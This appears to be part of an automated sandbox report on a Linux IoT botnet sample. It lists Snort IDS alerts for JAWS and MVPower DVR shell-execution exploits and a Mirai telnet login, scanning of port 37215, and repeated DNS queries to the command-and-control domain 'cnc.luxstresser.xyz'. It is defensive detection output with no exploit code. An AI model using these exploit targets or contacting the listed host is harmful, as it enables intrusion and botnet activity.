      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39820 -> 125.63.152.14:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39820 -> 125.63.152.14:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35132 -> 90.201.115.115:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35132 -> 90.201.115.115:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41744 -> 198.2.202.117:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51050 -> 67.186.218.75:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36864 -> 216.125.170.122:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40764 -> 223.27.39.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52616 -> 134.228.77.31:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52616 -> 134.228.77.31:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50796 -> 201.226.121.168:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56660 -> 47.242.77.212:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56660 -> 47.242.77.212:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36178 -> 219.68.232.164:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58204 -> 23.53.19.92:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.19.92:80 -> 192.168.2.23:58204
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58204 -> 23.53.19.92:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50024 -> 212.124.30.69:80
      Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:60260
      Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:60260
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41686 -> 35.162.37.136:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34544 -> 169.45.81.52:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53564 -> 104.79.135.61:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56332 -> 66.212.22.37:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35730 -> 174.35.126.242:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52180 -> 54.214.224.255:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56332 -> 66.212.22.37:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54200 -> 23.22.85.247:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.79.135.61:80 -> 192.168.2.23:53564
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58094 -> 155.159.183.21:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42324 -> 1.34.181.74:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52584 -> 52.56.93.214:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42324 -> 1.34.181.74:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60470 -> 144.208.70.131:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53602 -> 104.79.135.61:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33360 -> 18.130.12.121:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54602 -> 212.236.186.55:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51310 -> 95.167.220.217:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33360 -> 18.130.12.121:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55900 -> 114.124.227.100:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54602 -> 212.236.186.55:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35776 -> 149.169.31.165:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.79.135.61:80 -> 192.168.2.23:53602
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53602 -> 104.79.135.61:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 114.124.227.100:80 -> 192.168.2.23:55900
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55900 -> 114.124.227.100:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45012 -> 37.184.51.197:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45012 -> 37.184.51.197:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48796 -> 54.239.131.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56092 -> 92.204.43.117:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59274 -> 104.91.58.122:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41334 -> 64.87.23.140:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56918 -> 104.206.127.237:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39682 -> 23.39.254.8:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.91.58.122:80 -> 192.168.2.23:59274
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.39.254.8:80 -> 192.168.2.23:39682
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57706 -> 166.150.65.77:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54076 -> 23.201.85.40:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36006 -> 23.76.208.87:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40748 -> 104.94.164.62:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42942 -> 23.67.229.187:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43086 -> 167.172.244.142:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54276 -> 198.48.62.82:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.201.85.40:80 -> 192.168.2.23:54076
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54076 -> 23.201.85.40:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.67.229.187:80 -> 192.168.2.23:42942
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57706 -> 166.150.65.77:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43306 -> 104.99.201.149:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.76.208.87:80 -> 192.168.2.23:36006
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36006 -> 23.76.208.87:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.164.62:80 -> 192.168.2.23:40748
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.99.201.149:80 -> 192.168.2.23:43306
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43306 -> 104.99.201.149:80
      Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:60384
      Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:60384
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52614 -> 47.91.165.32:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41706 -> 104.19.142.87:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41706 -> 104.19.142.87:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39768 -> 212.95.138.97:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37380 -> 134.236.54.182:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45320 -> 41.239.209.160:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36114 -> 184.31.23.224:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58934 -> 14.45.110.129:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34638 -> 121.134.48.196:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32964 -> 184.86.170.86:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45320 -> 41.239.209.160:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57028 -> 104.116.220.174:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.31.23.224:80 -> 192.168.2.23:36114
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36114 -> 184.31.23.224:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42206 -> 192.155.165.37:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37380 -> 134.236.54.182:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.170.86:80 -> 192.168.2.23:32964
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32964 -> 184.86.170.86:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58934 -> 14.45.110.129:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42206 -> 192.155.165.37:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58700 -> 153.188.113.34:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.220.174:80 -> 192.168.2.23:57028
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57028 -> 104.116.220.174:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44024 -> 195.201.107.244:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44024 -> 195.201.107.244:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58700 -> 153.188.113.34:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34972 -> 85.214.192.8:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35104 -> 87.88.218.187:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41316 -> 54.195.18.149:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36560 -> 18.190.32.179:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57562 -> 104.64.85.230:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36560 -> 18.190.32.179:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49380 -> 23.36.24.242:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46736 -> 138.68.57.220:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41438 -> 168.76.119.157:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.36.24.242:80 -> 192.168.2.23:49380
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.64.85.230:80 -> 192.168.2.23:57562
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42524 -> 116.80.104.103:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51994 -> 207.148.75.30:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51994 -> 207.148.75.30:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41694 -> 46.161.12.48:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59598 -> 88.221.132.202:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.132.202:80 -> 192.168.2.23:59598
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48614 -> 45.39.169.26:80
      Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:60550
      Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:60550
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48614 -> 45.39.169.26:80
      Source: TrafficSnort IDS: 2023435 ET TROJAN Possible Linux.Mirai Login Attempt (888888) 192.168.2.23:35220 -> 43.252.199.80:23
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40814 -> 107.164.149.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39600 -> 68.39.223.213:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36838 -> 58.229.240.213:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54172 -> 104.94.8.233:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59724 -> 212.112.133.41:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35328 -> 115.42.27.195:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40814 -> 107.164.149.204:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.8.233:80 -> 192.168.2.23:54172
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39600 -> 68.39.223.213:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47228 -> 34.228.109.46:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47228 -> 34.228.109.46:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33714 -> 42.118.220.136:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42822 -> 61.0.155.247:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42822 -> 61.0.155.247:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52014 -> 209.182.101.171:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36618 -> 13.111.134.223:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53306 -> 35.239.203.36:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51846 -> 184.154.49.82:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52118 -> 181.214.78.141:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51846 -> 184.154.49.82:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51220 -> 213.225.239.196:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52118 -> 181.214.78.141:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51220 -> 213.225.239.196:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37654 -> 138.123.24.112:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49138 -> 104.216.48.158:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55650 -> 77.51.192.251:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59178 -> 102.221.92.210:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38338 -> 45.150.172.55:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36014 -> 1.242.230.196:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60700 -> 172.121.186.144:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54872 -> 23.223.152.126:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59178 -> 102.221.92.210:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43986 -> 69.192.1.50:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60700 -> 172.121.186.144:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.223.152.126:80 -> 192.168.2.23:54872
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48802 -> 158.199.238.109:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36014 -> 1.242.230.196:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58036 -> 186.139.109.120:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 69.192.1.50:80 -> 192.168.2.23:43986
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44352 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37090 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Performs DNS queries to domains with low reputation
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: DNS query: cnc.luxstresser.xyz
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.84.22.146:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.134.197.202:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.81.76.13:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.55.245.147:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.88.62.50:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.21.39.98:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.252.252.146:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.253.225.152:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.41.240.94:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.171.251.181:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.216.231.125:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.12.225.175:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.23.167.235:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.12.83.44:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.65.0.176:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.195.132.226:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.211.253.34:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.9.210.111:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.193.74.209:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.66.6.234:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.48.109.176:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.132.247.18:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.30.77.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.57.54.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.102.157.220:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.6.247.160:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.184.102.141:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.15.125.99:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.145.74.155:37215
